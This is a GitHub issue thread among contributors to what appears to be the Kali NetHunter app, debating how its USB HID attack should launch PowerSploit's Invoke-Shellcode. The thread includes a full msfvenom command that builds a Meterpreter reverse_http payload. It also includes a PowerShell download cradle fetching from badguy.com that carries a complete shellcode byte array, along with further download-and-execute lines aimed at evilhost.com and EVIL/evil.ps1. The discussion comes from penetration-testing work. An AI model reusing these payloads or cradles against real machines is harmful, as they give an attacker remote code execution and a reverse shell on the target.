Invoke-Shellcode

[mubix]

Thanks for the fixes in #113 - huge thanks to @jmingov in particular. Unfortunately "-Payload windows/meterpreter/reverse_https -Lhost 192.168.1.19 -Lport 4457" are no longer parameters of Invoke-Shellcode. It only takes a -Shellcode, -ProcessId, and -Force. I attempted to use an older version of Invoke-Shellcode but unfortunately while it did work, the updated version of Metasploit no longer accepts the payload built into them.

So my suggestions would be:

1. Remove the "LHOST" and "LPORT" options in the app itself as it really doesn't serve a purpose now since you cant actually change that option anymore
2. Change URL to Payload (just the text) in the app, to URL to Invoke-Shellcode.ps1 so that it's clearer what is happening/needed.
3. Make the payload look like this: iex (New-Object Net.WebClient).DownloadString("www.badguy.com:8080"); Invoke-Shellcode -Force where www.badguy.com:8080 is the URL from the URL to Payload option as it is now.

The other option is to make it much more generic and just have the URL option and tell them it needs to be an executable powershell script and then the only thing you need to worry about is "URL to Payload" and plug it into the DownloadString.

[jmingov]

Hello dears, @mubix @binkybear

Imo, 1,2 and 3 are easy to do (We have them already in the code) we need to remove, not to add for this ^^

Also the 'Other option (the generic one)' could be a great addition, so the user can have both in the app.

Jaime

[binkybear]

@mubix - After looking at Invoke-shellcode it still looks like we can pass -Shellcode. So we can generate the shellcode with msfvenom from code:

msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.1.12 LPORT=744 -f powershell EXITFUNC=thread --platform windows -o /tmp/pwrshell_string

Then run powerball.py to make it into correct output shellcode. Finally, here is the output to /var/www/html/payload-url (TODO: we should probably change location)

iex (New-Object Net.WebClient).DownloadString("badguy.com/oopzs.ps1"); Invoke-Shellcode -Force -Shellcode @(0xfc,0xe8,0x82,0x0,0x0,0x0,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0xc,0x8b,0x52,0x14,0x8b,0x72,0x28,0xf,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xc1,0xcf,0xd,0x1,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x1,0xd1,0x51,0x8b,0x59,0x20,0x1,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x1,0xd6,0x31,0xff,0xac,0xc1,0xcf,0xd,0x1,0xc7,0x38,0xe0,0x75,0xf6,0x3,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x1,0xd3,0x66,0x8b,0xc,0x4b,0x8b,0x58,0x1c,0x1,0xd3,0x8b,0x4,0x8b,0x1,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x6e,0x65,0x74,0x0,0x68,0x77,0x69,0x6e,0x69,0x54,0x68,0x4c,0x77,0x26,0x7,0xff,0xd5,0x31,0xdb,0x53,0x53,0x53,0x53,0x53,0x68,0x3a,0x56,0x79,0xa7,0xff,0xd5,0x53,0x53,0x6a,0x3,0x53,0x53,0x68,0xe8,0x2,0x0,0x0,0xe8,0x97,0x0,0x0,0x0,0x2f,0x41,0x6a,0x35,0x52,0x6a,0x33,0x32,0x45,0x76,0x58,0x7a,0x67,0x33,0x4f,0x48,0x64,0x74,0x6b,0x47,0x45,0x53,0x51,0x54,0x54,0x32,0x32,0x4a,0x74,0x48,0x72,0x30,0x32,0x68,0x78,0x4a,0x68,0x51,0x61,0x0,0x50,0x68,0x57,0x89,0x9f,0xc6,0xff,0xd5,0x89,0xc6,0x53,0x68,0x0,0x2,0x60,0x84,0x53,0x53,0x53,0x57,0x53,0x56,0x68,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x96,0x6a,0xa,0x5f,0x53,0x53,0x53,0x53,0x56,0x68,0x2d,0x6,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x75,0x8,0x4f,0x75,0xed,0xe8,0x49,0x0,0x0,0x0,0x6a,0x40,0x68,0x0,0x10,0x0,0x0,0x68,0x0,0x0,0x40,0x0,0x53,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x53,0x89,0xe7,0x57,0x68,0x0,0x20,0x0,0x0,0x53,0x56,0x68,0x12,0x96,0x89,0xe2,0xff,0xd5,0x85,0xc0,0x74,0xcf,0x8b,0x7,0x1,0xc3,0x85,0xc0,0x75,0xe5,0x58,0xc3,0x5f,0xe8,0x8b,0xff,0xff,0xff,0x31,0x39,0x32,0x2e,0x31,0x36,0x38,0x2e,0x31,0x2e,0x31,0x32,0x0,0xbb,0xe0,0x1d,0x2a,0xa,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x6,0x7c,0xa,0x80,0xfb,0xe0,0x75,0x5,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x0,0x53,0xff,0xd5)

TODO: We should add a progress bar dialogue to the update to show users whats happening.

Here is a test APK:
MD5: 3b0e8b0ea056b880306fbbf95ecdcebe
https://transfer.sh/WjWdD/nethunter-app-release.apk

[binkybear]

Updated with progress dialogue. Updated APK for testing:

https://transfer.sh/YInuc/nethunter-app-release.apk

[thesle3p]

I am concerned with something about this change: I Often use the USB HID attack in nethunter to execute powershell scripts other then invoke shellcode, would that still work, for example if I were to set the URL to "http://evilhost.com/empire-agent.ps1 it wouldn't run would it? I see the nethunter app looks to specifically execute the invoke shellcode cmdlet. Any chance a option could be added for a more generic download and execute attack?

[binkybear]

I believe we plan on integrating more with empire in the future. If you want a "generic" http to powershell I think that should be separate from this attack and probably should have its own tab or be made separate.

This attack was always specific for invoke shellcode script.

[thesle3p]

A more generic http to powershell tab would be really useful because I
often have a need to download and execute pure powershell payloads.

On 01/28/2016 06:58 PM, binkybear wrote:

I believe we plan on integrating more with empire in the future. If
you want a "generic" http to powershell I think that should be
separate from this attack and probably should have its own tab or be
made separate.

This attack was always specific for invoke shellcode script.

—
Reply to this email directly or view it on GitHub
#114 (comment).

[simonpunk]

but I think these changes are taking more time to get the payload execute on target. Like first, we have to wait more than 30 seconds for the msfvenom to generate the shellcode, and when we execute the attack, it again takes around 20 seconds to output the very very very long encoded strings, and sometimes it happens to report error with powershell likely because of the long encoded string. So I personally think that it is not so practical in this way. And I prefer the previous editon more. But just my opinion here.

[binkybear]

@simonpunk - Well we can easily drop the shellcode generation or maybe generate it after the attack is launched. I could also enable --smallest in msfvenom although I'm not sure how much of a difference it would make.

Another possible avenue, and probably the best, would be add the shellcode directly to ps1 file here: https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1#L427. Then we could skip all the hid typing of shellcode, however you would still have to wait for msfvenom to generate it. It could probably be done early with a separate button though.

[thesle3p]

To be honest it would be simple and easy to just add a option to
download and execute a powershell script using IEX (New-Object
Net.Webclient).downloadstring("http://EVIL/evil.ps1")

On 01/28/2016 09:26 PM, binkybear wrote:

@simonpunk https://github.com/simonpunk - Well we can easily drop
the shellcode generation or maybe generate it after the attack is
launched. I could also enable --smallest in msfvenom although I'm not
sure how much of a difference it would make.

Another possible avenue, and probably the best, would be add the
shellcode directly to ps1 file here:
https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1#L427.
Then we could skip all the hid typing of shellcode, however you would
still have to wait for msfvenom to generate it. It could probably be
done early with a separate button though.

—
Reply to this email directly or view it on GitHub
#114 (comment).